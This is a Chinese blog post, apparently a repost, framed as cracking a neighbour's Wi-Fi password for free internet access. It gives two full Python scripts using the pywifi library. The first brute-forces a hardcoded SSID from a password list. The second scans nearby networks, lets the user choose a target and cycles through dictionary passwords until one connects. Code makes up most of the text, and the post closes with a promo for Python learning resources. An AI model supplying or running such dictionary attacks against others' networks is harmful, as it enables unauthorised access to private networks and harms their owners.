当前位置:首页 » 《随便一记》 » 正文

昨晚停网后,我写了一段Python代码攻破了隔壁老王家的wifi密码

20 人参与  2022年12月22日 08:09  分类 : 《随便一记》  评论

点击全文阅读


前言

本文给大家分享的是如何通过 Python 脚本实现 WIFI 密码的暴力攻防,从而实现免费蹭网。

在这里插入图片描述

开发工具

Python版本: 3.8

相关模块:

pywifi模块

在这里插入图片描述

环境搭建

安装Python并添加到环境变量,pip安装需要的相关模块即可。

文中密码本,评论留言获取。

在这里插入图片描述

无图形界面

代码实现

import pywififrom pywifi import constimport timeimport datetime# 测试连接,返回链接结果def wifiConnect(pwd):    # 抓取网卡接口    wifi = pywifi.PyWiFi()    # 获取第一个无线网卡    ifaces = wifi.interfaces()[0]    # 断开所有连接    ifaces.disconnect()    time.sleep(1)    wifistatus = ifaces.status()    if wifistatus == const.IFACE_DISCONNECTED:        # 创建WiFi连接文件        profile = pywifi.Profile()        # 要连接WiFi的名称        profile.ssid = "Tr0e"        # 网卡的开放状态        profile.auth = const.AUTH_ALG_OPEN        # wifi加密算法,一般wifi加密算法为wps        profile.akm.append(const.AKM_TYPE_WPA2PSK)        # 加密单元        profile.cipher = const.CIPHER_TYPE_CCMP        # 调用密码        profile.key = pwd        # 删除所有连接过的wifi文件        ifaces.remove_all_network_profiles()        # 设定新的连接文件        tep_profile = ifaces.add_network_profile(profile)        ifaces.connect(tep_profile)        # wifi连接时间        time.sleep(2)        if ifaces.status() == const.IFACE_CONNECTED:            return True        else:            return False    else:        print("已有wifi连接")# 读取密码本def readPassword():    success = False    print("****************** WIFI攻防 ******************")    # 密码本路径    path = "pwd.txt"    # 打开文件    file = open(path, "r")    start = datetime.datetime.now()    while True:        try:            pwd = file.readline()            # 去除密码的末尾换行符            pwd = pwd.strip('\n')            bool = wifiConnect(pwd)            if bool:                print("[*] 密码已攻防:", pwd)                print("[*] WiFi已自动连接!!!")                success = True                break            else:                # 跳出当前循环,进行下一次循环                print("正在攻防 SSID 为 %s 的 WIFI密码,当前校验的密码为:%s"%("Tr0e",pwd))        except:            continue    end = datetime.datetime.now()    if(success):        print("[*] 本次破解WIFI密码一共用了多长时间:{}".format(end - start))    else:        print("[*] 很遗憾未能帮你攻防出当前指定WIFI的密码,请更换密码字典后重新尝试!")    exit(0)if __name__=="__main__":    readPassword()

代码运行效果:
在这里插入图片描述

脚本优化

以上脚本需内嵌 WIFI 名、爆破字典路径,缺少灵活性。下面进行改造优化:

import pywifiimport timefrom pywifi import const# WiFi扫描模块def wifi_scan():    # 初始化wifi    wifi = pywifi.PyWiFi()    # 使用第一个无线网卡    interface = wifi.interfaces()[0]    # 开始扫描    interface.scan()    for i in range(4):        time.sleep(1)        print('\r扫描可用 WiFi 中,请稍后。。。(' + str(3 - i), end=')')    print('\r扫描完成!\n' + '-' * 38)    print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名'))    # 扫描结果,scan_results()返回一个集,存放的是每个wifi对象    bss = interface.scan_results()    # 存放wifi名的集合    wifi_name_set = set()    for w in bss:        # 解决乱码问题        wifi_name_and_signal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8'))        wifi_name_set.add(wifi_name_and_signal)    # 存入列表并按信号排序    wifi_name_list = list(wifi_name_set)    wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True)    num = 0    # 格式化输出    while num < len(wifi_name_list):        print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1]))        num += 1    print('-' * 38)    # 返回wifi列表    return wifi_name_list# WIFI攻防模块def wifi_password_crack(wifi_name):    # 字典路径    wifi_dic_path = input("请输入本地用于WIFI暴力攻防的密码字典(txt格式,每个密码占据1行)的路径:")    with open(wifi_dic_path, 'r') as f:        # 遍历密码        for pwd in f:            # 去除密码的末尾换行符            pwd = pwd.strip('\n')            # 创建wifi对象            wifi = pywifi.PyWiFi()            # 创建网卡对象,为第一个wifi网卡            interface = wifi.interfaces()[0]            # 断开所有wifi连接            interface.disconnect()            # 等待其断开            while interface.status() == 4:                # 当其处于连接状态时,利用循环等待其断开                pass            # 创建连接文件(对象)            profile = pywifi.Profile()            # wifi名称            profile.ssid = wifi_name            # 需要认证            profile.auth = const.AUTH_ALG_OPEN            # wifi默认加密算法            profile.akm.append(const.AKM_TYPE_WPA2PSK)            profile.cipher = const.CIPHER_TYPE_CCMP            # wifi密码            profile.key = pwd            # 删除所有wifi连接文件            interface.remove_all_network_profiles()            # 设置新的wifi连接文件            tmp_profile = interface.add_network_profile(profile)            # 开始尝试连接            interface.connect(tmp_profile)            start_time = time.time()            while time.time() - start_time < 1.5:                # 接口状态为4代表连接成功(当尝试时间大于1.5秒之后则为错误密码,经测试测正确密码一般都在1.5秒内连接,若要提高准确性可以设置为2s或以上,相应暴力攻防速度就会变慢)                if interface.status() == 4:                    print(f'\r连接成功!密码为:{pwd}')                    exit(0)                else:                    print(f'\r正在利用密码 {pwd} 尝试攻防。', end='')# 主函数def main():    # 退出标致    exit_flag = 0    # 目标编号    target_num = -1    while not exit_flag:        try:            print('WiFi万能钥匙'.center(35, '-'))            # 调用扫描模块,返回一个排序后的wifi列表            wifi_list = wifi_scan()            # 让用户选择要攻防的wifi编号,并对用户输入的编号进行判断和异常处理            choose_exit_flag = 0            while not choose_exit_flag:                try:                    target_num = int(input('请选择你要尝试攻防的wifi:'))                    # 如果要选择的wifi编号在列表内,继续二次判断,否则重新输入                    if target_num in range(len(wifi_list)):                        # 二次确认                        while not choose_exit_flag:                            try:                                choose = str(input(f'你选择要攻防的WiFi名称是:{wifi_list[target_num][1]},确定吗?(Y/N)'))                                # 对用户输入进行小写处理,并判断                                if choose.lower() == 'y':                                    choose_exit_flag = 1                                elif choose.lower() == 'n':                                    break                                # 处理用户其它字母输入                                else:                                    print('只能输入 Y/N 哦o(* ̄︶ ̄*)o')                            # 处理用户非字母输入                            except ValueError:                                print('只能输入 Y/N 哦o(* ̄︶ ̄*)o')                        # 退出攻防                        if choose_exit_flag == 1:                            break                        else:                            print('请重新输入哦(*^▽^*)')                except ValueError:                    print('只能输入数字哦o(* ̄︶ ̄*)o')            # 密码攻防,传入用户选择的wifi名称            wifi_password_crack(wifi_list[target_num][1])            print('-' * 38)            exit_flag = 1        except Exception as e:            print(e)            raise eif __name__ == '__main__':    main()

脚本运行效果如下:
效果
上述代码实现了依据信号强度枚举当前附近的所有 WIFI 名称,并且可供用户自主选择需要暴力攻防的 WIFI;

同时还可灵活指定暴力攻防的字典,相对而言体验感提升了不少。进一步也可以将上述脚本打包生成 exe 文件,双击运行效果如下:
效果

最后

为了感谢读者们,我想把我最近收藏的一些编程干货分享给大家,回馈每一个读者,希望能帮到你们。

里面有适合小白新手的全套资料给到大家~

快来和小鱼一起成长进步吧!

① 100+多本Python电子书(主流和经典的书籍应该都有了)

② Python标准库资料(最全中文版)

③ 爬虫项目源码(四五十个有趣且经典的练手项目及源码)

④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)

⑤ Python学习路线图(告别不入流的学习)
资料


点击全文阅读


本文链接:http://zhangshiyu.com/post/50152.html

<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1